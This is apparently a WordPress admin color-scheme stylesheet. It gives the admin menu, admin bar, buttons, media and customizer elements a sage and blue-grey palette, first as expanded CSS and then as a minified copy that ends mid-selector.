.wp-has-current-submenu.opensub .wp-submenu a { color: rgb(213, 221.1, 223.5); } #adminmenu .wp-submenu a:focus, #adminmenu .wp-submenu a:hover, #adminmenu .wp-has-current-submenu .wp-submenu a:focus, #adminmenu .wp-has-current-submenu .wp-submenu a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover { color: #9ebaa0; } /* Admin Menu: current */ #adminmenu .wp-submenu li.current a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a { color: #fff; } #adminmenu .wp-submenu li.current a:hover, #adminmenu .wp-submenu li.current a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus { color: #9ebaa0; } ul#adminmenu a.wp-has-current-submenu:after, ul#adminmenu > li.current > a.current:after { border-right-color: #f0f0f0; } #adminmenu li.current a.menu-top, #adminmenu li.wp-has-current-submenu a.wp-has-current-submenu, #adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head, .folded #adminmenu li.current.menu-top { color: #fff; background: #9ebaa0; } #adminmenu li.wp-has-current-submenu div.wp-menu-image:before, #adminmenu a.current:hover div.wp-menu-image:before, #adminmenu li.current div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before, #adminmenu li:hover div.wp-menu-image:before, #adminmenu li a:focus div.wp-menu-image:before, #adminmenu li.opensub div.wp-menu-image:before { color: #fff; } /* Admin Menu: bubble */ #adminmenu .menu-counter, #adminmenu .awaiting-mod, #adminmenu .update-plugins { color: #fff; background: #aa9d88; } #adminmenu li.current a .awaiting-mod, #adminmenu li a.wp-has-current-submenu .update-plugins, #adminmenu li:hover a .awaiting-mod, #adminmenu li.menu-top:hover > a .update-plugins { color: #fff; background: rgb(98.2714285714, 123.5412244898, 131.0285714286); } /* Admin Menu: collapse button */ #collapse-button { color: #f2fcff; } #collapse-button:hover, #collapse-button:focus { color: #9ebaa0; } /* Admin Bar */ #wpadminbar { color: #fff; background: #738e96; } #wpadminbar .ab-item, #wpadminbar a.ab-item, #wpadminbar > #wp-toolbar span.ab-label, #wpadminbar > #wp-toolbar span.noticon { color: #fff; } #wpadminbar .ab-icon, #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar .ab-item:after { color: #f2fcff; } #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojq .quicklinks .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojs .ab-top-menu > li.menupop:hover > .ab-item, #wpadminbar .ab-top-menu > li.menupop.hover > .ab-item { color: #9ebaa0; background: rgb(98.2714285714, 123.5412244898, 131.0285714286); } #wpadminbar:not(.mobile) > #wp-toolbar li:hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar li.hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar a:focus span.ab-label { color: #9ebaa0; } #wpadminbar:not(.mobile) li:hover .ab-icon:before, #wpadminbar:not(.mobile) li:hover .ab-item:before, #wpadminbar:not(.mobile) li:hover .ab-item:after, #wpadminbar:not(.mobile) li:hover #adminbarsearch:before { color: #9ebaa0; } /* Admin Bar: submenu */ #wpadminbar .menupop .ab-sub-wrapper { background: rgb(98.2714285714, 123.5412244898, 131.0285714286); } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary, #wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu { background: rgb(142.7255, 154.4890142857, 157.9745); } #wpadminbar .ab-submenu .ab-item, #wpadminbar .quicklinks .menupop ul li a, #wpadminbar .quicklinks .menupop.hover ul li a, #wpadminbar.nojs .quicklinks .menupop:hover ul li a { color: rgb(213, 221.1, 223.5); } #wpadminbar .quicklinks li .blavatar, #wpadminbar .menupop .menupop > .ab-item:before { color: #f2fcff; } #wpadminbar .quicklinks .menupop ul li a:hover, #wpadminbar .quicklinks .menupop ul li a:focus, #wpadminbar .quicklinks .menupop ul li a:hover strong, #wpadminbar .quicklinks .menupop ul li a:focus strong, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a, #wpadminbar .quicklinks .menupop.hover ul li a:hover, #wpadminbar .quicklinks .menupop.hover ul li a:focus, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus, #wpadminbar li:hover .ab-icon:before, #wpadminbar li:hover .ab-item:before, #wpadminbar li a:focus .ab-icon:before, #wpadminbar li .ab-item:focus:before, #wpadminbar li .ab-item:focus .ab-icon:before, #wpadminbar li.hover .ab-icon:before, #wpadminbar li.hover .ab-item:before, #wpadminbar li:hover #adminbarsearch:before, #wpadminbar li #adminbarsearch.adminbar-focused:before { color: #9ebaa0; } #wpadminbar .quicklinks li a:hover .blavatar, #wpadminbar .quicklinks li a:focus .blavatar, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a .blavatar, #wpadminbar .menupop .menupop > .ab-item:hover:before, #wpadminbar.mobile .quicklinks .hover .ab-icon:before, #wpadminbar.mobile .quicklinks .hover .ab-item:before { color: #9ebaa0; } #wpadminbar.mobile .quicklinks .ab-icon:before, #wpadminbar.mobile .quicklinks .ab-item:before { color: #f2fcff; } /* Admin Bar: search */ #wpadminbar #adminbarsearch:before { color: #f2fcff; } #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus { color: #fff; background: rgb(135.4, 158.4657142857, 165.3); } /* Admin Bar: recovery mode */ #wpadminbar #wp-admin-bar-recovery-mode { color: #fff; background-color: #aa9d88; } #wpadminbar #wp-admin-bar-recovery-mode .ab-item, #wpadminbar #wp-admin-bar-recovery-mode a.ab-item { color: #fff; } #wpadminbar .ab-top-menu > #wp-admin-bar-recovery-mode.hover > .ab-item, #wpadminbar.nojq .quicklinks .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus { color: #fff; background-color: rgb(153, 141.3, 122.4); } /* Admin Bar: my account */ #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { border-color: rgb(135.4, 158.4657142857, 165.3); background-color: rgb(135.4, 158.4657142857, 165.3); } #wpadminbar #wp-admin-bar-user-info .display-name { color: #fff; } #wpadminbar #wp-admin-bar-user-info a:hover .display-name { color: #9ebaa0; } #wpadminbar #wp-admin-bar-user-info .username { color: rgb(213, 221.1, 223.5); } /* Pointers */ .wp-pointer .wp-pointer-content h3 { background-color: #9ebaa0; border-color: rgb(143.0993975904, 175.4006024096, 145.406626506); } .wp-pointer .wp-pointer-content h3:before { color: #9ebaa0; } .wp-pointer.wp-pointer-top .wp-pointer-arrow, .wp-pointer.wp-pointer-top .wp-pointer-arrow-inner, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner { border-bottom-color: #9ebaa0; } /* Media */ .media-item .bar, .media-progress-bar div { background-color: #9ebaa0; } .details.attachment { box-shadow: inset 0 0 0 3px #fff, inset 0 0 0 7px #9ebaa0; } .attachment.details .check { background-color: #9ebaa0; box-shadow: 0 0 0 1px #fff, 0 0 0 2px #9ebaa0; } .media-selection .attachment.selection.details .thumbnail { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #9ebaa0; } /* Themes */ .theme-browser .theme.active .theme-name, .theme-browser .theme.add-new-theme a:hover:after, .theme-browser .theme.add-new-theme a:focus:after { background: #9ebaa0; } .theme-browser .theme.add-new-theme a:hover span:after, .theme-browser .theme.add-new-theme a:focus span:after { color: #9ebaa0; } .theme-section.current, .theme-filter.current { border-bottom-color: #738e96; } body.more-filters-opened .more-filters { color: #fff; background-color: #738e96; } body.more-filters-opened .more-filters:before { color: #fff; } body.more-filters-opened .more-filters:hover, body.more-filters-opened .more-filters:focus { background-color: #9ebaa0; color: #fff; } body.more-filters-opened .more-filters:hover:before, body.more-filters-opened .more-filters:focus:before { color: #fff; } /* Widgets */ .widgets-chooser li.widgets-chooser-selected { background-color: #9ebaa0; color: #fff; } .widgets-chooser li.widgets-chooser-selected:before, .widgets-chooser li.widgets-chooser-selected:focus:before { color: #fff; } /* Nav Menus */ .nav-menus-php .item-edit:focus:before { box-shadow: 0 0 0 1px rgb(187.8012048193, 207.1987951807, 189.186746988), 0 0 2px 1px #9ebaa0; } /* Responsive Component */ div#wp-responsive-toggle a:before { color: #f2fcff; } .wp-responsive-open div#wp-responsive-toggle a { border-color: transparent; background: #9ebaa0; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a { background: rgb(98.2714285714, 123.5412244898, 131.0285714286); } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { color: #f2fcff; } /* TinyMCE */ .mce-container.mce-menu .mce-menu-item:hover, .mce-container.mce-menu .mce-menu-item.mce-selected, .mce-container.mce-menu .mce-menu-item:focus, .mce-container.mce-menu .mce-menu-item-normal.mce-active, .mce-container.mce-menu .mce-menu-item-preview.mce-active { background: #9ebaa0; } /* Customizer */ .wp-core-ui #customize-controls .control-section:hover > .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:hover, .wp-core-ui #customize-controls .control-section.open .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:focus { color: #0073aa; border-left-color: #9ebaa0; } .wp-core-ui .customize-controls-close:focus, .wp-core-ui .customize-controls-close:hover, .wp-core-ui .customize-controls-preview-toggle:focus, .wp-core-ui .customize-controls-preview-toggle:hover { color: #0073aa; border-top-color: #9ebaa0; } .wp-core-ui .customize-panel-back:hover, .wp-core-ui .customize-panel-back:focus, .wp-core-ui .customize-section-back:hover, .wp-core-ui .customize-section-back:focus { color: #0073aa; border-left-color: #9ebaa0; } .wp-core-ui .customize-screen-options-toggle:hover, .wp-core-ui .customize-screen-options-toggle:active, .wp-core-ui .customize-screen-options-toggle:focus, .wp-core-ui .active-menu-screen-options .customize-screen-options-toggle, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus { color: #0073aa; } .wp-core-ui .customize-screen-options-toggle:focus:before, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before, .wp-core-ui.wp-customizer button:focus .toggle-indicator:before, .wp-core-ui .menu-item-bar .item-delete:focus:before, .wp-core-ui #available-menu-items .item-add:focus:before, .wp-core-ui #customize-save-button-wrapper .save:focus, .wp-core-ui #publish-settings:focus { box-shadow: 0 0 0 1px rgb(187.8012048193, 207.1987951807, 189.186746988), 0 0 2px 1px #9ebaa0; } .wp-core-ui #customize-controls .customize-info.open .customize-help-toggle, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover { color: #0073aa; } .wp-core-ui .control-panel-themes .customize-themes-section-title:focus, .wp-core-ui .control-panel-themes .customize-themes-section-title:hover { border-left-color: #9ebaa0; color: #0073aa; } .wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after { background: #9ebaa0; } .wp-core-ui .control-panel-themes .customize-themes-section-title.selected { color: #0073aa; } .wp-core-ui #customize-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after, .wp-core-ui #customize-outer-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after { color: #0073aa; } .wp-core-ui .customize-control .attachment-media-view .button-add-media:focus { background-color: #fbfbfc; border-color: #9ebaa0; border-style: solid; box-shadow: 0 0 0 1px #9ebaa0; outline: 2px solid transparent; } .wp-core-ui .wp-full-overlay-footer .devices button:focus, .wp-core-ui .wp-full-overlay-footer .devices button.active:hover { border-bottom-color: #9ebaa0; } .wp-core-ui .wp-full-overlay-footer .devices button:hover:before, .wp-core-ui .wp-full-overlay-footer .devices button:focus:before { color: #9ebaa0; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus { color: #9ebaa0; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow { box-shadow: 0 0 0 1px rgb(187.8012048193, 207.1987951807, 189.186746988), 0 0 2px 1px #9ebaa0; } .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover { border-bottom-color: #9ebaa0; color: #0073aa; }/*! This file is auto-generated */ body{background:#f0f0f0}a{color:#0073aa}a:active,a:focus,a:hover{color:rgb(0,149.5,221)}#post-body #visibility:before,#post-body .misc-pub-post-status:before,#post-body .misc-pub-revisions:before,.curtime #timestamp:before,span.wp-media-buttons-icon:before{color:currentColor}.wp-core-ui .button-link,.wp-core-ui .button.button-link{color:var(--wp-admin-theme-color)}.wp-core-ui .button-link:active,.wp-core-ui .button-link:hover,.wp-core-ui .button.button-link:active,.wp-core-ui .button.button-link:hover{color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-link:focus,.wp-core-ui .button.button-link:focus{color:var(--wp-admin-theme-color);border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-link:disabled,.wp-core-ui .button-link[aria-disabled=true],.wp-core-ui .button.button-link:disabled,.wp-core-ui .button.button-link[aria-disabled=true]{color:#949494}.media-modal .delete-attachment,.media-modal .trash-attachment,.media-modal .untrash-attachment,.wp-core-ui .button-link-delete{color:#cc1818}.media-modal .delete-attachment:focus,.media-modal .delete-attachment:hover,.media-modal .trash-attachment:focus,.media-modal .trash-attachment:hover,.media-modal .untrash-attachment:focus,.media-modal .untrash-attachment:hover,.wp-core-ui .button-link-delete:focus,.wp-core-ui .button-link-delete:hover{color:rgb(230.6842105263,48.3157894737,48.3157894737)}input[type=checkbox]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}input[type=radio]:checked{background:var(--wp-admin-theme-color);border-color:var(--wp-admin-theme-color)}.wp-core-ui input[type=reset]:active,.wp-core-ui input[type=reset]:hover{color:rgb(0,149.5,221)}input[type=color]:focus,input[type=date]:focus,input[type=datetime-local]:focus,input[type=datetime]:focus,input[type=email]:focus,input[type=month]:focus,input[type=number]:focus,input[type=password]:focus,input[type=search]:focus,input[type=tel]:focus,input[type=text]:focus,input[type=time]:focus,input[type=url]:focus,input[type=week]:focus,select:focus,textarea:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}input[type=checkbox]:focus,input[type=radio]:focus{border-color:#1e1e1e;box-shadow:0 0 0 2px #fff,0 0 0 4px var(--wp-admin-theme-color);outline:2px solid transparent}.wp-core-ui select:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-tags-autocomplete .ui-state-focus,.wp-tags-autocomplete [aria-selected=true]{background-color:var(--wp-admin-theme-color)}#pass1-text:focus,#pass1:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.mailserver-pass-wrap .button.wp-hide-pw:focus{border-color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color)}.wp-core-ui .button{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button.disabled,.wp-core-ui .button:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-secondary{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wp-core-ui .button-secondary:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wp-core-ui .button-secondary:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wp-core-ui .button-secondary:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.wp-core-ui .button-secondary.disabled,.wp-core-ui .button-secondary:disabled{background:0 0;border-color:#ddd;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary{background:var(--wp-admin-theme-color);border-color:transparent;border-radius:2px;color:#fff}.wp-core-ui .button-primary:hover{background:var(--wp-admin-theme-color-darker-10);border-color:transparent;color:#fff}.wp-core-ui .button-primary:focus{background:var(--wp-admin-theme-color);border-color:transparent;color:#fff;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color),inset 0 0 0 1px #fff;outline:1px solid transparent}.wp-core-ui .button-primary:active{background:var(--wp-admin-theme-color-darker-20);border-color:transparent;color:#fff}.wp-core-ui .button-primary.disabled,.wp-core-ui .button-primary:disabled{background:#f0f0f0;border-color:transparent;color:#949494;cursor:not-allowed}.wp-core-ui .button-primary.active,.wp-core-ui .button-primary.active:focus,.wp-core-ui .button-primary.active:hover{background:var(--wp-admin-theme-color-darker-10);color:#fff;border-color:transparent;box-shadow:none}.wp-core-ui .button-group>.button.active{border-color:var(--wp-admin-theme-color);background:rgba(var(--wp-admin-theme-color--rgb),.08)}.wp-core-ui .wp-ui-primary{color:#fff;background-color:#738e96}.wp-core-ui .wp-ui-text-primary{color:#738e96}.wp-core-ui .wp-ui-highlight{color:#fff;background-color:#9ebaa0}.wp-core-ui .wp-ui-text-highlight{color:#9ebaa0}.wp-core-ui .wp-ui-notification{color:#fff;background-color:#aa9d88}.wp-core-ui .wp-ui-text-notification{color:#aa9d88}.wp-core-ui .wp-ui-text-icon{color:#f2fcff}.wrap .page-title-action{background:0 0;border:1px solid var(--wp-admin-theme-color);border-radius:2px;color:var(--wp-admin-theme-color)}.wrap .page-title-action:hover{background:rgba(var(--wp-admin-theme-color--rgb),.04);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20)}.wrap .page-title-action:focus{background:0 0;border-color:var(--wp-admin-theme-color);color:var(--wp-admin-theme-color);box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color);outline:1px solid transparent}.wrap .page-title-action:active{background:rgba(var(--wp-admin-theme-color--rgb),.08);border-color:var(--wp-admin-theme-color-darker-20);color:var(--wp-admin-theme-color-darker-20);box-shadow:none}.view-switch a.current:before{color:#738e96}.view-switch a:hover:before{color:#aa9d88}#adminmenu,#adminmenuback,#adminmenuwrap{background:#738e96}#adminmenu a{color:#fff}#adminmenu div.wp-menu-image:before{color:#f2fcff}#adminmenu a:hover,#adminmenu li.menu-top:hover,#adminmenu li.opensub>a.menu-top,#adminmenu li>a.menu-top:focus{color:#fff;background-color:#9ebaa0}#adminmenu li.menu-top:hover div.wp-menu-image:before,#adminmenu li.opensub>a.menu-top div.wp-menu-image:before{color:#fff}.about-wrap .nav-tab-active,.nav-tab-active,.nav-tab-active:hover{background-color:#f0f0f0;border-bottom-color:#f0f0f0}#adminmenu .wp-has-current-submenu .wp-submenu,#adminmenu .wp-has-current-submenu.opensub .wp-submenu,#adminmenu .wp-submenu,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu{background:rgb(98.2714285714,123.5412244898,131.0285714286)}#adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after,#adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after{border-right-color:rgb(98.2714285714,123.5412244898,131.0285714286)}#adminmenu .wp-submenu .wp-submenu-head{color:rgb(213,221.1,223.5)}#adminmenu .wp-has-current-submenu .wp-submenu a,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a,#adminmenu .wp-submenu a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a{color:rgb(213,221.1,223.5)}#adminmenu .wp-has-current-submenu .wp-submenu a:focus,#adminmenu .wp-has-current-submenu .wp-submenu a:hover,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover,#adminmenu .wp-submenu a:focus,#adminmenu .wp-submenu a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu a:hover{color:#9ebaa0}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a,#adminmenu .wp-submenu li.current a,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a{color:#fff}#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus,#adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover,#adminmenu .wp-submenu li.current a:focus,#adminmenu .wp-submenu li.current a:hover,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:focus,#adminmenu a.wp-has-current-submenu:focus+.wp-submenu li.current a:hover{color:#9ebaa0}ul#adminmenu a.wp-has-current-submenu:after,ul#adminmenu>li.current>a.current:after{border-right-color:#f0f0f0}#adminmenu li.current a.menu-top,#adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head,#adminmenu li.wp-has-current-submenu a.wp-has-current-submenu,.folded #adminmenu li.current.menu-top{color:#fff;background:#9ebaa0}#adminmenu a.current:hover div.wp-menu-image:before,#adminmenu li a:focus div.wp-menu-image:before,#adminmenu li.current div.wp-menu-image:before,#adminmenu li.opensub div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu div.wp-menu-image:before,#adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before,#adminmenu li:hover div.wp-menu-image:before{color:#fff}#adminmenu .awaiting-mod,#adminmenu .menu-counter,#adminmenu .update-plugins{color:#fff;background:#aa9d88}#adminmenu li a.wp-has-current-submenu .update-plugins,#adminmenu li.current a .awaiting-mod,#adminmenu li.menu-top:hover>a .update-plugins,#adminmenu li:hover a .awaiting-mod{color:#fff;background:rgb(98.2714285714,123.5412244898,131.0285714286)}#collapse-button{color:#f2fcff}#collapse-button:focus,#collapse-button:hover{color:#9ebaa0}#wpadminbar{color:#fff;background:#738e96}#wpadminbar .ab-item,#wpadminbar a.ab-item,#wpadminbar>#wp-toolbar span.ab-label,#wpadminbar>#wp-toolbar span.noticon{color:#fff}#wpadminbar .ab-icon,#wpadminbar .ab-icon:before,#wpadminbar .ab-item:after,#wpadminbar .ab-item:before{color:#f2fcff}#wpadminbar .ab-top-menu>li.menupop.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>li>.ab-item:focus,#wpadminbar.nojs .ab-top-menu>li.menupop:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>li>.ab-item:focus{color:#9ebaa0;background:rgb(98.2714285714,123.5412244898,131.0285714286)}#wpadminbar:not(.mobile)>#wp-toolbar a:focus span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li.hover span.ab-label,#wpadminbar:not(.mobile)>#wp-toolbar li:hover span.ab-label{color:#9ebaa0}#wpadminbar:not(.mobile) li:hover #adminbarsearch:before,#wpadminbar:not(.mobile) li:hover .ab-icon:before,#wpadminbar:not(.mobile) li:hover .ab-item:after,#wpadminbar:not(.mobile) li:hover .ab-item:before{color:#9ebaa0}#wpadminbar .menupop .ab-sub-wrapper{background:rgb(98.2714285714,123.5412244898,131.0285714286)}#wpadminbar .quicklinks .menupop ul.ab-sub-secondary,#wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu{background:rgb(142.7255,154.4890142857,157.9745)}#wpadminbar .ab-submenu .ab-item,#wpadminbar .quicklinks .menupop ul li a,#wpadminbar .quicklinks .menupop.hover ul li a,#wpadminbar.nojs .quicklinks .menupop:hover ul li a{color:rgb(213,221.1,223.5)}#wpadminbar .menupop .menupop>.ab-item:before,#wpadminbar .quicklinks li .blavatar{color:#f2fcff}#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a,#wpadminbar .quicklinks .menupop ul li a:focus,#wpadminbar .quicklinks .menupop ul li a:focus strong,#wpadminbar .quicklinks .menupop ul li a:hover,#wpadminbar .quicklinks .menupop ul li a:hover strong,#wpadminbar .quicklinks .menupop.hover ul li a:focus,#wpadminbar .quicklinks .menupop.hover ul li a:hover,#wpadminbar li #adminbarsearch.adminbar-focused:before,#wpadminbar li .ab-item:focus .ab-icon:before,#wpadminbar li .ab-item:focus:before,#wpadminbar li a:focus .ab-icon:before,#wpadminbar li.hover .ab-icon:before,#wpadminbar li.hover .ab-item:before,#wpadminbar li:hover #adminbarsearch:before,#wpadminbar li:hover .ab-icon:before,#wpadminbar li:hover .ab-item:before,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus,#wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover{color:#9ebaa0}#wpadminbar .menupop .menupop>.ab-item:hover:before,#wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover>a .blavatar,#wpadminbar .quicklinks li a:focus .blavatar,#wpadminbar .quicklinks li a:hover .blavatar,#wpadminbar.mobile .quicklinks .hover .ab-icon:before,#wpadminbar.mobile .quicklinks .hover .ab-item:before{color:#9ebaa0}#wpadminbar.mobile .quicklinks .ab-icon:before,#wpadminbar.mobile .quicklinks .ab-item:before{color:#f2fcff}#wpadminbar #adminbarsearch:before{color:#f2fcff}#wpadminbar>#wp-toolbar>#wp-admin-bar-top-secondary>#wp-admin-bar-search #adminbarsearch input.adminbar-input:focus{color:#fff;background:rgb(135.4,158.4657142857,165.3)}#wpadminbar #wp-admin-bar-recovery-mode{color:#fff;background-color:#aa9d88}#wpadminbar #wp-admin-bar-recovery-mode .ab-item,#wpadminbar #wp-admin-bar-recovery-mode a.ab-item{color:#fff}#wpadminbar .ab-top-menu>#wp-admin-bar-recovery-mode.hover>.ab-item,#wpadminbar.nojq .quicklinks .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode:hover>.ab-item,#wpadminbar:not(.mobile) .ab-top-menu>#wp-admin-bar-recovery-mode>.ab-item:focus{color:#fff;background-color:rgb(153,141.3,122.4)}#wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar>a img{border-color:rgb(135.4,158.4657142857,165.3);background-color:rgb(135.4,158.4657142857,165.3)}#wpadminbar #wp-admin-bar-user-info .display-name{color:#fff}#wpadminbar #wp-admin-bar-user-info a:hover .display-name{color:#9ebaa0}#wpadminbar #wp-admin-bar-user-info .username{color:rgb(213,221.1,223.5)}.wp-pointer .wp-pointer-content h3{background-color:#9ebaa0;border-color:rgb(143.0993975904,175.4006024096,145.406626506)}.wp-pointer .wp-pointer-content h3:before{color:#9ebaa0}.wp-pointer.wp-pointer-top .wp-pointer-arrow,.wp-pointer.wp-pointer-top .wp-pointer-arrow-inner,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow,.wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner{border-bottom-color:#9ebaa0}.media-item .bar,.media-progress-bar div{background-color:#9ebaa0}.details.attachment{box-shadow:inset 0 0 0 3px #fff,inset 0 0 0 7px #9ebaa0}.attachment.details .check{background-color:#9ebaa0;box-shadow:0 0 0 1px #fff,0 0 0 2px #9ebaa0}.media-selection .attachment.selection.details .thumbnail{box-shadow:0 0 0 1px #fff,0 0 0 3px #9ebaa0}.theme-browser .theme.active .theme-name,.theme-browser .theme.add-new-theme a:focus:after,.theme-browser .theme.add-new-theme 